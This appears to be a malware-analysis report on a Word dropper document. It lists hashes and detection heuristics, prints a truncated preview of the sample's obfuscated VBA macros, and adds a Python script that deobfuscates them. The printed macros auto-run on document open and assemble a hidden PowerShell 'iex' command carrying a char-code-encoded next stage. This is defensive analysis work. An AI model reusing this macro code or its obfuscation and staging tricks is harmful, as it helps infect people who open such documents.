Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 12591c6d970f4de3…

MALICIOUS

Office (OLE)

Size: 338.8 KB
Created: 2018-07-12 13:22:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: 5ae3e2481aae98eabb8fca92950782e1
SHA-1: 1373520794b4ad5c7a656332147664cf7668705d
SHA-256: 12591c6d970f4de30d40245824b76d27268190cb314abcfa4da65bbd3522afb4
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Word document carrying VBA macros. Its Document_open handler runs automatically when the document is opened (ATT&CK T1059.005); it concatenates eighteen identifiers (helper functions such as MFiEcwjRSP and qHVhqnwbn, mixed with names that are never assigned) into one string and passes that string to Application.Run("pDzlSCUsFGsYB", ...). The routine it names lies past the preview cutoff, but the OLE_VBA_SHELL heuristic found a Shell() call in the macro code, so that is the likely point at which the assembled string is executed. The helpers hide their literals in '+' chains of undeclared variables (uninitialised Variants, which concatenate as empty strings) and pad every function with dead arithmetic; reading only the literals shows what is being built. It is a PowerShell command line: the token 'poWERshELl', followed by $SHEllid[1]+$sheLlId[13]+'x', which evaluates to iex because the automatic variable $ShellId holds 'Microsoft.PowerShell'; a Set-itEM 'VARIABLe:ofs' '' call that clears the output field separator so a character array converts to a string without spaces; and a [stRinG ... cast applied to a list of integers ( (36,85, 76,7... that is the next-stage script encoded as character codes (36,85,76 decode to '$UL'; the rest is cut off in the preview). ClamAV's signature Doc.Dropper.Agent-6608687-0 classifies the file as a dropper. The encoded PowerShell is the second stage; whether it downloads a further payload cannot be confirmed from the fragments that survived truncation. The only URL carved from the document body is the DrawingML XML namespace that Office documents carry routinely and is not an indicator.
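The reconstruction described above, as an added example for this report (it is not code from the sample, from oletools or from any other tool the page names). The VBA assignment lines in VBA_LINES are copied from the macros.bas preview below; the evaluator treats every never-assigned name as an empty string, exactly as VBA does with an uninitialised Variant, and replays the assignments in order so that a Function's return value (assigned to its own name) is available to later lines. The value of $ShellId is PowerShell's documented automatic variable; the function names and the integer array used in the last call are constructed for illustration.

```python
"""Replay the string-building VBA from this sample to recover the PowerShell it
assembles. Added example for this report, not code from the sample or from any
tool named on the page. VBA_LINES is copied from the macros.bas preview; the
inputs marked 'constructed' are made up for illustration."""
import re

# Copied from the preview: function MFiEcwjRSP() with two of its junk
# arithmetic lines kept on purpose, then the first assignment of qHVhqnwbn(),
# which the preview cuts off mid-line (so its last number is incomplete).
VBA_LINES = r"""
mAUHSU = wMRrd * svzDz * 69289 / iiqalh + 63885 * oVWzwJ - slzaDh * oUmukQ / (2474 / ffDVO)
skVOVFQ = "" + VlnaKrvuiQKDN + jRzuVoqwQs + "poW" + qtdudisdoQGVw + QTGwpbIXEPKnE + "ER" + WiYBEABWjUVai + dzvvZcKu + "shE" + hWYiTvnzA + wuVsPzZdTA + "Ll " + ulMrJFLM + nWdcrNZhchX + " " + Chr(34) + " &" + CaCKfkQcNHPi + DdsojlT + "( "
mBIFPzuP = "" + jsAjCYl + XGOuWAkPM + "$SH" + fUnMjhJTUIAw + PVLwjFbXTLdD + "Elli" + UjLSiQULEozUOS + WKhIGiZT + "d[1]" + KIAcifPKw + hNPRDQXwOqIfKo + Chr(43) + "$s" + KspKspQGMK + SFEUGMp + "he"
TpbIX = (50375 / EjUoqI / 776 * LfHwAI / (JajnGq / DsotG))
KmCccXa = "" + isDQlaHPwql + mYMDwjt + "Ll"
wNJdbTBHFW = "" + NwpVmod + PIZhnOVh + "Id" + SPsfjkhZ + jOjBBpjqofArzQ + "[1" + nVklzMJzVlV + kEPBQaAZ + "3]" + Chr(43) + "'"
SaoiBS = "" + qnHSEoYZ + FTCtjKwtp + "x')" + jkaNRlRJNk + bZdQHDFzFWw + "(\" + Chr(34) + GsbwYfkfn + hEnDHPk + "$(Se" + qbTCtpq + OMmUwLsp + "t-i" + FTznTbiDPBqqm + ZiZZCjp + "tEM " + YtQMGcLRCu + snAbLlajSYaS + " 'VA" + jSQLFPTcPZ + wnqZoruYjr + "RIA" + rzPQCATzwhwsBq + MQYaQoom + "BLe:" + kjYrsptSUIADZP + ZPrwYzCkL + "ofs" + wjCIcXJPk + oGwiWjI + "' " + IUDPZvuVnjojd + lSzYfQzVoVakzp + "''"
RBhzSlt = "" + MRIfPqC + SDzOzwsVoq + " )\" + Chr(34) + AfNtkWhIQtYtGY + ZRtcwmjMwkKzm + " " + Chr(43) + " [" + VHILmumfUU + YiEIbKEw + "st" + uwNwBwAMiVZXCl + ztnmZIij + "Ri" + scjoiuwYNKzn + iIlzhBbSJOKLJ + "nG"
MFiEcwjRSP = "" + mThqTDYctn + iYoPLzzHRW + skVOVFQ + GFaSUiWlNBaqPz + GfsMDbztVzzL + mBIFPzuP + FPojjNdFIPQ + dzzzOZLB + KmCccXa + SviIjzUfLZk + BjNMIAWd + wNJdbTBHFW + QUwXAklA + mVoFFzInkE + SaoiBS + hmwSBNCBPAW + nkZUuaZIb + RBhzSlt
mYAbjCnsZsE = "" + XkZmijwU + PCLOFaCOKv + "]( (" + wKqzSjRWIYpiih + RVVLMMEiKDw + "36," + PsfFalOw + SCEMrNdjX + "85" + zoZukmFHnP + MsjJdEwPhjED + ", " + ANUjTYnm + FKpzJou + "76,7" + UsTKDAfbfqNj + dlsnGvLuZacD
"""

TOKEN = re.compile(
    r'"((?:[^"]|"")*)"'   # VBA string literal; a doubled quote inside one is an escaped quote
    r"|Chr\((\d+)\)"      # Chr(n): a character by code, used here for " and +
    r"|([A-Za-z_]\w*)"    # identifier: a variable, or a Function called by bare name
)
ASSIGN = re.compile(r"\s*([A-Za-z_]\w*)\s*=\s*(.*)$")


def eval_concat(rhs, env):
    """Evaluate one '+' chain. Any name missing from env is an undeclared
    Variant holding Empty, which concatenates as "", so the noise vanishes."""
    parts = []
    for lit, code, name in TOKEN.findall(rhs):
        if code:
            parts.append(chr(int(code)))
        elif name:
            parts.append(env.get(name, ""))
        else:
            parts.append(lit.replace('""', '"'))
    return "".join(parts)


def run_assignments(vba, env=None):
    """Replay 'name = expr' lines in order, keeping only those with a string
    literal or Chr() on the right; the arithmetic lines are dead code. A VBA
    Function returns by assigning to its own name, so 'MFiEcwjRSP = ...' ends
    up in env like any variable, ready for Document_open's concatenation."""
    env = {} if env is None else env
    for line in vba.splitlines():
        m = ASSIGN.match(line)
        if m and ('"' in m.group(2) or "Chr(" in m.group(2)):
            env[m.group(1)] = eval_concat(m.group(2), env)
    return env


def reconstruct():
    """Return (command text built by MFiEcwjRSP, first fragment of qHVhqnwbn).
    Document_open joins MFiEcwjRSP and qHVhqnwbn in that order, but the preview
    stops before qHVhqnwbn's return assignment, so the text between the two
    pieces is unknown."""
    env = run_assignments(VBA_LINES)
    return env["MFiEcwjRSP"], env["mYAbjCnsZsE"]


SHELL_ID = "Microsoft.PowerShell"   # value of PowerShell's automatic variable $ShellId


def reveal_shellid_alias(cmd):
    """$ShellId[1]+$ShellId[13]+'x' is 'i'+'e'+'x': substitute the indexed
    characters, then fold adjacent single-quoted literals joined by '+'."""
    cmd = re.sub(r"\$shellid\[(\d+)\]",
                 lambda m: "'%s'" % SHELL_ID[int(m.group(1))], cmd, flags=re.I)
    fold = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    prev = None
    while prev != cmd:
        prev, cmd = cmd, fold.sub(r"'\1\2'", cmd)
    return cmd


def decode_char_array(ps):
    """Decode the '( (n, n, ...' integer list that follows the [string] cast:
    each number is the code of one character of the next-stage script.
    Set-Item Variable:ofs '' empties $OFS first, so [string][char[]] joins
    the characters with no separator between them."""
    m = re.search(r"\(\s*\(\s*([\d,\s]+)", ps)
    return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1)))


if __name__ == "__main__":
    head, frag = reconstruct()
    print(head)                           # the PowerShell prefix, noise removed
    print(reveal_shellid_alias(head))     # ... &( 'iex')( ...
    print(frag)                           # ]( (36,85, 76,7  (last number truncated by the preview)
    print(decode_char_array(frag)[:3])    # $UL
    print(decode_char_array("[stRinG][char[]]( (36,97,61,49) )"))   # constructed input: $a=1
```

Two things the replay makes concrete: the junk arithmetic never feeds the string, so filtering assignments on the presence of a literal or Chr() loses nothing, and the Document_open argument can be rebuilt in the same way once the full preview (or a pcodedmp/olevba dump of the remaining functions) supplies the other helper bodies.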

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6608687-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6608687-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro code contains a Shell() call, i.e. a path to command execution
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open handler is present and runs as soon as the document is opened
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches documents whose macros exist only as p-code, or where source extraction failed, so that no visible source is available.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body). This is the DrawingML XML namespace URI that any Office document with drawing content carries; it is not a contacted host and not an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                  | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 45742 bytes
SHA-256: b8aeb309ae3a871621b12113f0b527752b58a7963d1afe40b5b1bb0bcff5d9ec
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "PaSOnTflGh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   vSGUEQ = (zjsBH + lOzdXX + qsvlUu + YczwS) - QzXdY * GwYudt
   fubZws = (ECXUA + NdVmu + FdmqVE + QASwRs) - CYdBXB * hMwAJ
   LjiFfF = (WCuANW + jNhUh + ASiXL + qjsfXA) - dWutm * JbDUP
   UJaYM = 85690 - Lqwuf - TSLfw / isncLC - 26715 / rYDjZo - quuLfz * zIGUNO * ndrOc + XhjOV
   UmmQU = 81738 - dYQTSw - viWrpz / EvLRwi - 35989 / Nfphj - KWpzX * YOMXwj * cDKXj + lQrbzY
   JYQppM = (iWfOqi + BmfZvC + zMatv + GKEUjs) - AIzCOs * VFoXMW
QjVsmVQFFBJ = Application.Run("pDzlSCUsFGsYB", "" + UDHiJjPsEFUAcU + FbRHpAT + MFiEcwjRSP + qHVhqnwbn + UGAFIoNO + DEwvNKGHYNn + pMWsfVOD + ckWZviK + ObMmSjhMU + kuYlSq + zQbVZSZY + ofQrjKc + jVwfL + sDTTUMjpq + ISCuUVz + oWnKKszB + KlikMckIhs + EpinUPPqFD)
   hwCTu = 81484 - LOCDbt - Tnruc / OfjaIn - 58133 / waPHd - DOZQN * SHFBlH * JvbwKa + vCRcKH
End Sub


Attribute VB_Name = "OnnwwZIFN"
Function MFiEcwjRSP()
On Error Resume Next
mAUHSU = wMRrd * svzDz * 69289 / iiqalh + 63885 * oVWzwJ - slzaDh * oUmukQ / (2474 / ffDVO)
skVOVFQ = "" + VlnaKrvuiQKDN + jRzuVoqwQs + "poW" + qtdudisdoQGVw + QTGwpbIXEPKnE + "ER" + WiYBEABWjUVai + dzvvZcKu + "shE" + hWYiTvnzA + wuVsPzZdTA + "Ll " + ulMrJFLM + nWdcrNZhchX + " " + Chr(34) + " &" + CaCKfkQcNHPi + DdsojlT + "( "
ibKLj = nkmmtO * niRUiH + 4054 * mNzhz + (7261 / BADJwj * NztwB + OGVwAu * (opjjCi * vNMdld / jlikR * VVUaf))
   OmGLEm = sjIEK * GujcW + 511 * POzwHW + (7657 / tqANvc * YZYMpp + fWowm * (zIEOT * iApHEi / nztIqO * SWHDKK))
mBIFPzuP = "" + jsAjCYl + XGOuWAkPM + "$SH" + fUnMjhJTUIAw + PVLwjFbXTLdD + "Elli" + UjLSiQULEozUOS + WKhIGiZT + "d[1]" + KIAcifPKw + hNPRDQXwOqIfKo + Chr(43) + "$s" + KspKspQGMK + SFEUGMp + "he"
TpbIX = (50375 / EjUoqI / 776 * LfHwAI / (JajnGq / DsotG))
   hSjRIF = (41195 / zbYIz / 54849 * pCVuif / (YkTwq / bzwBOK))
   qCOBU = (29473 / BcqnPJ / 9868 * IbEsw / (FsoSj / moZzz))
KmCccXa = "" + isDQlaHPwql + mYMDwjt + "Ll"
bpbctF = (2810 / bnPvWl / 4098 * cbdCI / (XmGhh / AOkquB))
   wobPG = (36292 / lzdSaL / 83497 * CDfjJR / (VLXamM / YAUuw))
   KOowzf = (42997 / pwhOXc / 81761 * uaQUV / (FXZNY / LOzSij))
wNJdbTBHFW = "" + NwpVmod + PIZhnOVh + "Id" + SPsfjkhZ + jOjBBpjqofArzQ + "[1" + nVklzMJzVlV + kEPBQaAZ + "3]" + Chr(43) + "'"
UUBnu = (37525 / vGnsaK / 33268 * umsPi / (wpjZk / lJwhWB))
   zEwkzZ = (44884 / PiJfQ / 67044 * RXaIu / (iUOKj / mIGVZ))
   wfisHK = (51664 / bUCzM / 77705 * wTFmfQ / (TjDbk / hqKEPp))
SaoiBS = "" + qnHSEoYZ + FTCtjKwtp + "x')" + jkaNRlRJNk + bZdQHDFzFWw + "(\" + Chr(34) + GsbwYfkfn + hEnDHPk + "$(Se" + qbTCtpq + OMmUwLsp + "t-i" + FTznTbiDPBqqm + ZiZZCjp + "tEM " + YtQMGcLRCu + snAbLlajSYaS + " 'VA" + jSQLFPTcPZ + wnqZoruYjr + "RIA" + rzPQCATzwhwsBq + MQYaQoom + "BLe:" + kjYrsptSUIADZP + ZPrwYzCkL + "ofs" + wjCIcXJPk + oGwiWjI + "' " + IUDPZvuVnjojd + lSzYfQzVoVakzp + "''"
bBYKd = (56317 / jhdncD / 71073 * LkDwE / (kibJwP / wKvfMK))
RBhzSlt = "" + MRIfPqC + SDzOzwsVoq + " )\" + Chr(34) + AfNtkWhIQtYtGY + ZRtcwmjMwkKzm + " " + Chr(43) + " [" + VHILmumfUU + YiEIbKEw + "st" + uwNwBwAMiVZXCl + ztnmZIij + "Ri" + scjoiuwYNKzn + iIlzhBbSJOKLJ + "nG"
MFiEcwjRSP = "" + mThqTDYctn + iYoPLzzHRW + skVOVFQ + GFaSUiWlNBaqPz + GfsMDbztVzzL + mBIFPzuP + FPojjNdFIPQ + dzzzOZLB + KmCccXa + SviIjzUfLZk + BjNMIAWd + wNJdbTBHFW + QUwXAklA + mVoFFzInkE + SaoiBS + hmwSBNCBPAW + nkZUuaZIb + RBhzSlt
   FrKhHf = (86927 / BawnKC / 52678 * YnjoRq / (IPDNzU / vKGqRF))
   sIHLri = (86927 / romJbh / 68349 * zaDlw / (qRNjT / duTGOQ))
End Function
Function qHVhqnwbn()
On Error Resume Next
TKPPmk = (60792 / aSliaj / 73397 * PuBRDR / (FUfnjU / VSBJNi))
mYAbjCnsZsE = "" + XkZmijwU + PCLOFaCOKv + "]( (" + wKqzSjRWIYpiih + RVVLMMEiKDw + "36," + PsfFalOw + SCEMrNdjX + "85" + zoZukmFHnP + MsjJdEwPhjED + ", " + ANUjTYnm + FKpzJou + "76,7" + UsTKDAfbfqNj + dlsnGvLuZacD 
... (truncated)